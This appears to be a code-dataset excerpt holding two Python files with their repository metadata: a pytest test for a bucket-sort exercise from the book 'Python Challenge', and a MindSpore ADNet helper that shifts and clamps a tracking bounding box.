eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch09_search_and_sort/ex07_bucket_sort_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch09_search_and_sort.solutions.ex07_bucket_sort import bucket_sort
@pytest.mark.parametrize("values, max, expected",
[([10, 50, 22, 7, 42, 111, 50, 7], 150,
[7, 7, 10, 22, 42, 50, 50, 111]),
([10, 50, 22, 7, 42, 111, 50, 7], 120,
[7, 7, 10, 22, 42, 50, 50, 111]),
[[5, 2, 7, 9, 6, 3, 1, 4, 2, 3, 8], 10,
[1, 2, 2, 3, 3, 4, 5, 6, 7, 8, 9]]])
def test_bucket_sort(values, max, expected):
result = bucket_sort(values, max)
assert result == expected
| 34.428571 | 71 | 0.492393 |
0deda45b4198481e5651eed91a682068abdec048
| 1,830 |
py
|
Python
|
official/cv/ADNet/src/utils/do_action.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/ADNet/src/utils/do_action.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/ADNet/src/utils/do_action.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
def do_action(bbox, opts, act, imSize):
m = opts['action_move']
# action
bbox[0] = bbox[0] + 0.5 * bbox[2]
bbox[1] = bbox[1] + 0.5 * bbox[3]
deltas = [m['x'] * bbox[2],
m['y'] * bbox[3],
m['w'] * bbox[2],
m['h'] * bbox[3]]
deltas = np.maximum(deltas, 1)
ar = bbox[2]/bbox[3]
if bbox[2] > bbox[3]:
deltas[3] = deltas[2] / ar
else:
deltas[2] = deltas[3] * ar
action_delta = np.multiply(np.array(m['deltas'])[act, :], deltas)
bbox_next = bbox + action_delta
bbox_next[0] = bbox_next[0] - 0.5 * bbox_next[2]
bbox_next[1] = bbox_next[1] - 0.5 * bbox_next[3]
bbox_next[0] = np.maximum(bbox_next[0], 1)
bbox_next[0] = np.minimum(bbox_next[0], imSize[1] - bbox_next[2])
bbox_next[1] = np.maximum(bbox_next[1], 1)
bbox_next[1] = np.minimum(bbox_next[1], imSize[0] - bbox_next[3])
bbox_next[2] = np.maximum(5, np.minimum(imSize[1], bbox_next[2]))
bbox_next[3] = np.maximum(5, np.minimum(imSize[0], bbox_next[3]))
bbox[0] = bbox[0] - 0.5 * bbox[2]
bbox[1] = bbox[1] - 0.5 * bbox[3]
return bbox_next
| 33.888889 | 78 | 0.598361 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.